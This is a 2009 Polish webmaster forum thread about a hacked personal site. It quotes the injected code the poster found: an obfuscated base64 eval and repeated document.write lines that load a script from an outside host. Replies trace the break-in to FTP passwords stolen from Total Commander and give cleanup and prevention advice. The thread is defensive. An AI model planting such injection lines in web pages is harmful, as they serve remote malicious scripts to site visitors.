włamanie na strone Opcje

[john_doe]

Witam,

dziwna sprawa www.transgabar.pl

strona kolegi który sobie sam ją zrobił. Dzisiaj dzwoni do mnie, że coś nie śmiga.

Przejrzałem źródła strony i

1. w pliku index był wyciety początek pliku do rozpoczęcia znacznika <head>

gdzieś na dole w stylu display: none było coś takiego

eval(base64_decode('tutaj same krzaczki'));

2. tego flasha załączył dzięki swfObject.js

na końcu tego pliku było

[HTML] pobierz, plaintext 
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
[HTML] pobierz, plaintext 

jak ktoś takie coś zrobił

jak można zmienić pliki bez włamania na konto i wyedytowania ich. Na tej stronie nie ma formularzy, bazy danych itp. Co to za atak?

Ten post edytował john_doe 23.10.2009, 10:26:54

[nospor]

a czy twoj kolega uzywa totalcommandera? Pewnie wirus wykradl hasla z niego i sie zalogowal do niego na ftp i robil co chcial. Bardzo powszechny atak ostatnio. na forum czesto omawiany

[john_doe]

na bank używa totala. czego używać zamiast tego?
nospor dzięki. wiedziałem, że Ty od razu odpowiesz
czyli mial jakiegos wirusa na kompie? gdyby np. jakiegos tam feralnego dnia logowal sie totalem z innego kompa nie doszło by do tego?

[nospor]

niech zmieni hasla do ftp a nastepnie niech nie zapamietuje ich w totalu

[thek]

Twórcy Totala obiecywali już jakiś czas temu, że błąd naprawią, gdyż obecnie hasła są przechowywane w sposób, który umożliwia ich prosty odczyt przez trojany, wirki czy co tam chcesz. Jak to stoi obecnie? Nie wiem czy wywiązali się z obietnicy bo już nie używam TC do ftp (Filezilla) i haseł też nigdzie nie zapamiętuję do plików ( dla bezpieczeństwa ) w programie. Zapamiętuję jedynie na czas sesji. Sam problem jest już jakoś od lutego znany bodajże albo i wcześniej (ja wtedy jakoś się z nim zetknąłem). Z tego co czytałem to dotyczył on także innych programów do łączenia z ftp, które miały niezabezpieczone pliki konfiguracyjne.
Pozostaje Ci zmienić hasła ( i nie zapamiętywać nigdzie ich ), usunąć wstawki do plików i koniecznie sprawdzić wszystkie katalogi serwera. Działa to bowiem tak, że kod jest dodawany do istniejących plików index.htm, html i czasem php. Jeśli takich nie znajdzie to tworzy na serwerze pliki index.html ze swoim kodem wewnątrz w każdym katalogu jaki przejrzy.

[Daiquiri]

Może winscp (na windowsa) lub CyberDuck(na maca)? Sama się w podobny i uroczy sposób zrobiłam w TotalCmd Należę do osób częściowo leniwych więc hasła zapamiętuję, ale z brakiem np. jednej litery na końcu. Przy połączeniu wypluwa mi błąd związany z hasłem/loginem - a ja dopisuje tylko literkę na końcu .

[nmts]

Od dobrych kilku miesięcy w TC oprócz hasła do ftp podaje się dodatkowe hasło szyfrujące i wystarcza to na zwykłe wirusy iframe, bo wykradając hasła musiałyby poznać to dodatkowe , które jest potrzebne do połączenia. Więc jeśli nikt nie ma keyloggera to może chyba czuć się bezpiecznie?

[kilab]

To i ja dorzucę swoje 'pare groszy'. Przeniosłem się z TC po podobnych atakach na FileZill'e i nie zapamiętuję haseł. Od trzech miesięcy nie mam problemu z takimi akcjami 

[l0ud]

Mimo wszystko zamiana programu to tylko obejście problemu (i to pewnie czasowe). W jakiś sposób te hasła wyciekły, czyli wirusy nadal działają.

[nmts]

No przecież napisałem, że wystarczy szyfrować hasła i nikt się nie zaloguje bez klucza po wykradnięciu pliku, ale skoro nadal szukacie rozwiązania to Wasza sprawa. ^^

[vokiel]

Przede wszystkim to należy zabezpieczyć komputer antywirusem, firewallem. Co jakiś czas zrobić skanowanie systemu. Jeśli intruz się nie dostanie z zewnątrz, to sam z siebie się nie urodzi. Poza tym dobrą praktyką jest przenoszenie domyślnych konfiguracji. TC na to pozwala. To się tyczy nie tylko TC, ale innych programów, które nie szyfrują haseł.